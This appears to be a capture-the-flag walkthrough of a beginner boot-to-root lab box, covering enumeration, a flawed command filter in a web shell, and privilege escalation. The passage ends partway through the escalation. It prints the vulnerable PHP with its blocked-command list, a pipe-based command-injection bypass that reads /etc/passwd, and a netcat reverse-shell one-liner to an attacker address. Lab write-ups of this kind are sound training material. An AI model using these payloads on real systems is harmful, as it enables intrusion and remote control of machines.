Author: c0rruptedb1t
Difficulty: Beginner/Intermediate
Privilege Escalation: Intermediate
Target IP: 192.168.75.130
Phase 1: Enumeration
The full-range port scan using nmap discloses three services running with remotely accessible ports:-> an ftp server running the ProFTPD version 1.3.5b daemon
-> an Apache web server running on port 80
-> a ssh daemon running on the uncommon port 25468:
Of course, it may seem like a mess to someone else reading it, but overall I started enumerating each linked page on the target as well as the pages residing within the robots.txt file. The dev_shell.php file seemed to be of most interest, and even though it seemed to contain some kind of filter the simplest way I found to execute a command was to pipe echo along with the command:
echo|cat /etc/passwd
Running dirb with the -X .bak option would additionally disclose there are some .bak files on the server containing the sources of the php files, which I achieved easier using listing the web server directory contents from the dev_shell.php web shell, which shows what exactly kind of filter is used. Also note that the web server front page menu has a z-index of -11 which makes the links inaccessible directly so I just reverted it to a positive 11 to be able to navigate through the browser. The source code of dev_shell.php.bak:
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
...
<? php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
The above script would check for a ‘;’ string within the command input, then iterate through the commands and parameters in case not found, split the input by a space and iterate through each array value, and disallow triggering a command in case it’s in the list of restricted commands. However, in case a command is piped it gets executed as the script is vulnerable to command execution via piping and doesn’t check for a “|” passed to its input.
Phase 2: RCE
To spawn a shell, I used the following commands:echo|mknod /tmp/backpipe p echo|/bin/sh 0</tmp/backpipe | /bin/nc 192.168.75.120 443 1>/tmp/backpipe
Phase 3: Putting together the pieces
From this point it’s all about connecting who said what about who and who stored what (or where) as a password. While browsing through the /home directory the first thing that brought my attention was the file theadminisdumb.txt
Phase 4: Privilege Escalation
The privilege escalation on this box is rather easy, as long as you look for something suspicious, out of the regular picture. I keep seeing how most people advise to enumerate configuration files and look for issues (with which of course I agree), but my lesson learned on this box was with privilege escalation – there was a file residing on the server, which supposedly should have contained something important – so you have to look for the human element. Once you browse through the directory structure in /home you’d notice the following files in the “Documents” folder of user bob:
-= Notes =- Harry Potter is my faviorite Are you the real me? Right, I'm ordering pizza this is going nowhere People just don't get me Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here> Cucumber Rest now your eyes are sleepy Are you gonna stop reading this yet? Time to fix the server Everyone is annoying Sticky notes gotta buy emSo the word “HARPOCRATES” (which according to google was the God of silence, secrets and confidentiality) should be either a password for the account Bob or the password required to unlock the file. Trying it as a direct password on user Bob didn’t work:
